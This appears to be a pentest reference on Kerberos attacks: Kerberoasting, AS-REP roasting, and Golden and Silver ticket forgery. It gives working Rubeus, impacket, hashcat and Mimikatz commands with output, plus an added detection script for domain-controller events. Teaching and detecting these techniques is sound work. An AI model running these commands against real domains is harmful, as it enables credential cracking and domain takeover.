# Kerberos Attacks

## Relationships and Attack paths

We can use [BloodHound](https://infra.newerasec.com/infrastructure-testing/tools/bloodhound) to find hidden relationships and attack paths in an Active Directory environment.

From the data collected we can find a path to escalate our privileges to the target, or use tools like [aclpwn](https://infra.newerasec.com/infrastructure-testing/tools/bloodhound/aclpwn) to act on the discovered ACL-based paths.

## Kerberoasting

The [AD PowerShell](https://github.com/samratashok/ADModule) module can be used to search for user accounts that have an SPN set:

```
Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose
Get-ADUser -LdapFilter "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))" | Format-Table Name, DistinguishedName
```

Using the Nmap `krb5-enum-users` script (enumerates valid usernames against the KDC on port 88):

`nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'`

Using Rubeus to request service tickets and write the crackable hashes to a file:

`Rubeus.exe kerberoast /outfile:hashes.txt`

Use hashcat mode 13100 (Kerberos 5 TGS-REP etype 23) to crack them:

`hashcat -a 0 -m 13100 SPN.hash /wordlists/rockyou.txt`

Using impacket:

```
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
```

<https://newerasec.com/kerberoasting/>

## AS-REP Roasting

Find users that do not require Kerberos pre-authentication (the `DONT_REQ_PREAUTH` flag in `userAccountControl`, 0x400000 = 4194304) using the [AD PowerShell](https://github.com/samratashok/ADModule) module:

```
Import-Module .\Microsoft.ActiveDirectory.Management.dll -Verbose

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name
```

To exploit, run:

```
.\Rubeus.exe asreproast
```

Using impacket:

```
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```

<https://newerasec.com/as-roast/>
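From the defender's side, both the Kerberoasting section and the AS-REP roasting section above leave a distinctive trace on the Domain Controller: a burst of RC4 (etype 23) service-ticket requests (event 4769) for user-account SPNs, and TGT requests (event 4768) answered without pre-authentication. The following is an added example, not code from the original page or from any of the tools it mentions, that triages a constructed, simplified set of such events; the flattened field names (`client`, `service`, `etype`, `pre_auth_type`) are assumed to come from a log pipeline, since real events are EVTX/XML. It also carries the `DONT_REQ_PREAUTH` bit test that the `Get-ADUser` filter above performs, so a `userAccountControl` value can be checked offline.

```python
"""Triage of Domain Controller Kerberos events for roasting activity (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17            # etype 23: the ticket type hashcat -m 13100 / AS-REP cracking targets
DONT_REQ_PREAUTH = 0x400000  # 4194304, the userAccountControl bit tested by the Get-ADUser filter

# Constructed sample events (not real telemetry); field names are assumed pipeline output.
SAMPLE_EVENTS = [
    # Normal traffic: AES (etype 0x12) service ticket for a machine-account SPN
    {"id": 4769, "time": "2020-04-06T14:00:00", "client": "alice", "service": "WS01$", "etype": 0x12, "ip": "10.0.0.5"},
    # Kerberoasting pattern: one client, several user-account SPNs, all RC4, within seconds
    {"id": 4769, "time": "2020-04-06T14:05:01", "client": "bob", "service": "svc_sql", "etype": 0x17, "ip": "10.0.0.9"},
    {"id": 4769, "time": "2020-04-06T14:05:02", "client": "bob", "service": "svc_web", "etype": 0x17, "ip": "10.0.0.9"},
    {"id": 4769, "time": "2020-04-06T14:05:02", "client": "bob", "service": "svc_backup", "etype": 0x17, "ip": "10.0.0.9"},
    {"id": 4769, "time": "2020-04-06T14:05:03", "client": "bob", "service": "svc_sap", "etype": 0x17, "ip": "10.0.0.9"},
    # AS-REP roasting pattern: TGT issued with pre_auth_type 0 (no pre-authentication) and RC4
    {"id": 4768, "time": "2020-04-06T14:06:00", "client": "svc_legacy", "pre_auth_type": 0, "etype": 0x17, "ip": "10.0.0.9"},
    # Legitimate TGT request: pre_auth_type 2 (PA-ENC-TIMESTAMP) and AES
    {"id": 4768, "time": "2020-04-06T14:06:30", "client": "alice", "pre_auth_type": 2, "etype": 0x12, "ip": "10.0.0.5"},
]


def is_user_spn(service: str) -> bool:
    """Machine accounts end in '$'; Kerberoasting is only useful against user accounts with SPNs."""
    return not service.endswith("$")


def find_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Return {client: sorted(services)} for clients that obtained RC4 service tickets
    for at least `min_services` distinct user-account SPNs inside a `window`."""
    by_client = defaultdict(list)
    for e in events:
        if e["id"] == 4769 and e["etype"] == RC4_HMAC and is_user_spn(e["service"]):
            by_client[e["client"]].append((datetime.fromisoformat(e["time"]), e["service"]))
    hits = {}
    for client, reqs in by_client.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):           # slide the window over the sorted requests
            services = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                hits[client] = sorted(services)
                break
    return hits


def find_asrep_roasting(events):
    """Return accounts whose TGT was issued without pre-authentication using RC4."""
    return sorted({e["client"] for e in events
                   if e["id"] == 4768 and e.get("pre_auth_type") == 0 and e["etype"] == RC4_HMAC})


def preauth_not_required(user_account_control: int) -> bool:
    """True when the account would answer an AS-REQ without pre-authentication."""
    return bool(user_account_control & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    print("Kerberoasting suspects:", find_kerberoasting(SAMPLE_EVENTS))
    print("AS-REP roastable logons:", find_asrep_roasting(SAMPLE_EVENTS))
    print("0x410200 has DONT_REQ_PREAUTH:", preauth_not_required(0x410200))
```

The thresholds (`window`, `min_services`) are tuning knobs, not fixed rules: a single RC4 ticket request is normal in a domain that still has RC4-only services, so the signal is the combination of RC4, user-account SPNs and volume from one client. Removing the `DONT_REQ_PREAUTH` flag and enforcing AES for service accounts removes the underlying exposure rather than only detecting it.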

## Golden Ticket

Once you have obtained the krbtgt hash (from DCSync or a DC compromise), the Mimikatz `kerberos::golden` module can forge Golden Tickets (TGTs signed with the krbtgt key).

We need the following parameters:

* /domain - name of the domain
* /sid - the SID of the domain (can be obtained from `whoami /user`; remember to strip the trailing RID)
* /rc4 - the NTLM hash of krbtgt
* /user - the user you want to create the new TGT for
* /id - the RID of the user the ticket is created for
* /ptt - (optional) inject the new ticket into the current session; if not given, the ticket is saved to a file

```
mimikatz # kerberos::golden /domain:eth.lab /sid:S-1-5-21-98033113-2199257571-2188946577 /rc4:88a4507aae31297a2df7921b1430d781 /user:Administrator /id:500  /ptt
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 88a4507aae31297a2df7921b1430d781 - rc4_hmac_nt
Lifetime  : 06/04/2020 14:05:45 ; 04/04/2030 14:05:45 ; 04/04/2030 14:05:45
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session 
```

## Silver Ticket

Use the `kerberos::golden` module to forge a TGS (service ticket). We need to pass the following parameters:

* /domain: the FQDN of the domain
* /sid: the SID (Security Identifier) of the domain (`whoami /user`)
* /user: target account/computer to impersonate
* /id: RID of the account you will be impersonating
* /ptt: optional (will automatically inject the ticket into the current session)
* /rc4: NTLM hash of the user password/computer account password
* /service: the service we want to access (e.g. `cifs`)
* /target: the FQDN of the host offering the service

**Example:**

```
mimikatz # kerberos::golden /sid:S-1-5-21-98033113-2199257571-2188946577-500 /domain:eth.lab /ptt /id:500 /target:WIN-EU4DLP9KRRC.eth.lab /service:cifs /rc4:0c0d4252608be9131c2826a6feaf94b8 /user:Administrator
User      : Administrator
Domain    : eth.lab (ETH)
SID       : S-1-5-21-98033113-2199257571-2188946577-500
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 0c0d4252608be9131c2826a6feaf94b8 - rc4_hmac_nt
Service   : cifs
Target    : WIN-EU4DLP9KRRC.eth.lab
Lifetime  : 03/04/2020 17:00:01 ; 01/04/2030 17:00:01 ; 01/04/2030 17:00:01
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ eth.lab' successfully submitted for current session
```
